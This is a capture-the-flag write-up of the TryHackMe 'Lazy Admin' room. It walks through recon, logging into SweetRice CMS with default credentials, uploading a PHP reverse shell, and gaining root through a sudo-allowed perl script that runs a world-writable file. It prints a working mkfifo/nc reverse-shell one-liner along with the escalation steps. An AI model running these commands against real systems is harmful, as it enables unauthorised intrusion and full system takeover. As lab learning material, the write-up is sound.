💭 Thoughts after doing the room

I didn’t explore all attack vectors in this room. On the TryHackMe page, the only information given was “Have some fun! There might be multiple ways to get user access.” I think I used the most common method.

The Sweet-Rice CMS was quite exotic, so when I googled it, I found more TryHackMe write-ups than CMS documentation to get the default password. As for the root part, I enjoyed the challenge of having to discover that www-data had access to another home directory.

Overall, it was pretty straightforward, but not very exciting. I think it would have been more enjoyable if I hadn’t googled for exploits of that version. Then, I would have had to find my own way into the machine.

Task 1: Lazy Admin

What is the user flag?

No hints and no other text provided. Trying nmap default scan first

root@ip-10-10-123-222:~# IP=
root@ip-10-10-123-222:~# nmap -T4 $IP

Starting Nmap 7.60 ( ) at 2023-04-02 20:41 BST
Nmap scan report for (
Host is up (0.0011s latency).
Not shown: 998 closed ports
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:DF:1D:DF:D1:75 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

Checking the webpage, its just a default apache site. Further nmap testing information gathering

root@ip-10-10-123-222:~# nmap -p80 -sV -sC $IP

Starting Nmap 7.60 ( ) at 2023-04-02 20:43 BST
Nmap scan report for (
Host is up (0.00019s latency).

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:DF:1D:DF:D1:75 (Unknown)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds

Bruteforcing common wordlist on the http server to see if there is anything

root@ip-10-10-123-222:~# gobuster dir --url $IP -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2023/04/02 20:46:29 Starting gobuster
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/.hta (Status: 403)
/content (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
2023/04/02 20:46:33 Finished

/content looks interesting. It shows this page

It shows that it’s powered by SweetRice and a page that looks like it’s just setup. So I’ll google for default credentials and path to the admin interface first.

Google shows the password as text snippet before visiting any page. Almost all search results are TryHackMe writeups ^^ so I don’t click one to avoid spoilers.

I can login sucessfully with the credentials. I see that it has version 1.5.1

First I enable the site like described on the first landing page I saw.

to check if it renders. I could try to find a way to upload a file manually now. But I first try with googling “SweetRice exploit 1.5.1”, the first entry was SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution which says that it’s possible to upload a file in the Ads section. So I upload the popular php one from PentestMonkey. The ExploitDB entry also tells the location of the script.

So I start a listener with nc and access the URL in the browser like this

root@ip-10-10-123-222:~# nc -nvlp 1337
Listening on [] (family 0, port 1337)
Connection from 38976 received!
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 23:28:37 up 49 min,  0 users,  load average: 0.12, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ whoami
$ pwd
$ cat /etc/passwd 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
$ find / -name user.txt 2>/dev/null 
$ cat /home/itguy/user.txt

I first checked which user I’m logged in with, then checked if the passwd file to see users and the UID 1000 is interesting. But I then decided to just search the user flag with the commonly known filename.

The 2>/dev/null is to avoid permission errors. Those errors are written to /dev/null instead to screen outout.

What is the root flag?

Now I’ll check sudo privileges like usually.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/

It shows that I can use perl as root but just for the file /home/itguy/

This probably requires doing more with the terminal session, so I’ll upgrade to a better shell. I check with which python if python exists and then execute

python -c 'import pty;pty.spawn("/bin/bash")'

I output the perl script

www-data@THM-Chal:/home/itguy$ cat

system("sh", "/etc/");

I check the permissions for

www-data@THM-Chal:/etc$ stat
  File: ''
  Size: 81        	Blocks: 8          IO Block: 4096   regular file
Device: ca01h/51713d	Inode: 1050508     Links: 1
Access: (0647/-rw-r--rwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2023-04-02 23:44:27.980000000 +0300
Modify: 2019-11-29 13:45:39.542648714 +0200
Change: 2019-11-29 13:45:39.542648714 +0200
 Birth: -

I see that it’s writeably by anyone.

www-data@THM-Chal:/etc$ cat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f

If I output the file it conveniently already contains a reverse shell, just with the wrong IP.

So I adapt it and overwrite the current contents.

www-data@THM-Chal:/etc$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f" > /etc/
<;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f" > /etc/   


www-data@THM-Chal:/etc$ cat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f

Then I execute the file with sudo and perl

www-data@THM-Chal:/home/itguy$ which perl
which perl
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/ 
sudo /usr/bin/perl /home/itguy/
rm: cannot remove '/tmp/f': No such file or directory

It executes and I get the root shell

# whoami
# cd /root
# ls
# cat root.txt